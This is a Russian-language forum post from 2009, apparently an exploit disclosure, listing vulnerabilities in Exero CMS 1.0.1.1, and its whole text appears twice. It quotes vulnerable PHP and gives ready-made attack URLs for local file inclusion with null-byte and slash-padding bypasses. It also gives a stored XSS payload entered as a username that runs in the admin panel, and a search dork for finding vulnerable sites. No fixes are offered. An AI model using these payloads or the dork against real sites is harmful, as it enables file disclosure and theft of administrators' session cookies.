Spyder
13.04.2009, 22:38
Exero CMS 1.0.1.1 Multiple Vulnerabilities
1) Local File Inclusion
Need: magic_quotes_gpc=off
Файл: index.php
if(empty($_REQUEST['module'])) {
include("modules/".$ecms->settings['defaultmod']);
} else if(file_exists("modules/".$_REQUEST['module']."/index.php")) {
include("modules/".$_REQUEST['module']."/index.php");
} else {
include("themes/$theme/errors/404.php");
}
Собственно инклуд тут в двух местах
www.site.com/index.php?module={INC}%00
и
www.site.com/index.php?module=not_exist_module&theme={INC}%00
Для второго случая наличие magic_quotes_gpc=off не обязательно, обходим известным способом со слешами
www.site.com/index.php?module=not_exist_module&theme={INC} {/ x 4096}
2) XSS
XSS в коментарии к новосятм
Файл: /modules/news/index.php
XSS при регистрации. Указываем в логине <script>alert(document.cookie)</script>
Файлы подверженые уязвимости:
/modules/community/members.php
$getuserinfo = $db->query("SELECT * FROM users");
while($userinfo = $db->fetch_array($getuserinfo)) {
$users[$users['rowcount']] = $userinfo;
$users['rowcount']++;
}
/admin/users.php
$getusers = $db->query("SELECT * FROM ".TABLE_PREFIX."users ORDER BY uid ASC");
while($userinfo = $db->fetch_array($getusers)) {
print_multicol_row(array($userinfo['username']."[align:left]"=>"","<a href=\"users.php?do=edit&user=".$userinfo['uid']."\">Edit</a>, <a href=\"users.php?do=delete&user=".$userinfo['uid']."\">Delete</a>[align:right]"=>"140"));
}
т.е xss будет прямо в админке
dork: "Powered by Exero CMS"
1) Local File Inclusion
Need: magic_quotes_gpc=off
Файл: index.php
if(empty($_REQUEST['module'])) {
include("modules/".$ecms->settings['defaultmod']);
} else if(file_exists("modules/".$_REQUEST['module']."/index.php")) {
include("modules/".$_REQUEST['module']."/index.php");
} else {
include("themes/$theme/errors/404.php");
}
Собственно инклуд тут в двух местах
www.site.com/index.php?module={INC}%00
и
www.site.com/index.php?module=not_exist_module&theme={INC}%00
Для второго случая наличие magic_quotes_gpc=off не обязательно, обходим известным способом со слешами
www.site.com/index.php?module=not_exist_module&theme={INC} {/ x 4096}
2) XSS
XSS в коментарии к новосятм
Файл: /modules/news/index.php
XSS при регистрации. Указываем в логине <script>alert(document.cookie)</script>
Файлы подверженые уязвимости:
/modules/community/members.php
$getuserinfo = $db->query("SELECT * FROM users");
while($userinfo = $db->fetch_array($getuserinfo)) {
$users[$users['rowcount']] = $userinfo;
$users['rowcount']++;
}
/admin/users.php
$getusers = $db->query("SELECT * FROM ".TABLE_PREFIX."users ORDER BY uid ASC");
while($userinfo = $db->fetch_array($getusers)) {
print_multicol_row(array($userinfo['username']."[align:left]"=>"","<a href=\"users.php?do=edit&user=".$userinfo['uid']."\">Edit</a>, <a href=\"users.php?do=delete&user=".$userinfo['uid']."\">Delete</a>[align:right]"=>"140"));
}
т.е xss будет прямо в админке
dork: "Powered by Exero CMS"